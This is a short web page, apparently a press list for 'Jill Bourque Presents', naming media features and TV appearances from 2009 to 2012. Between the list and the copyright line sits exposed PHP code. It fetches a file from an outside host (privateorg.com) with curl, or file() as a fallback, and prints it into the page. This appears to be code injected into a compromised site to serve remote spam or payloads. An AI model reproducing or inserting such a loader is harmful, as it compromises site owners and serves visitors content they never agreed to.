- 5/10/12 – Feature on NBC Bay Area
- 3/10/12 – Profile in Castro Valley Patch
- 2/10/11 – Feature in Bay Times
- 2/1/11 – Feature in Bay Stages
- 12/30/11 – Appearance on KRON TV
- 2/13/09 – Feature in SF Examiner
- 2/12/09 – Appearance on KRON TV
|
|||||
if (extension_loaded("curl")) { $ch = curl_init(); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_URL, "http://privateorg.com/ten/ten.dat"); $r = curl_exec($ch); curl_close($ch); } else { $r=implode("",file("http://privateorg.com/ten/ten.dat")); } if($r) print $r; ?> |
|
||||
Copyright © 2023 Jill Bourque Presents - All Rights Reserved ☺ |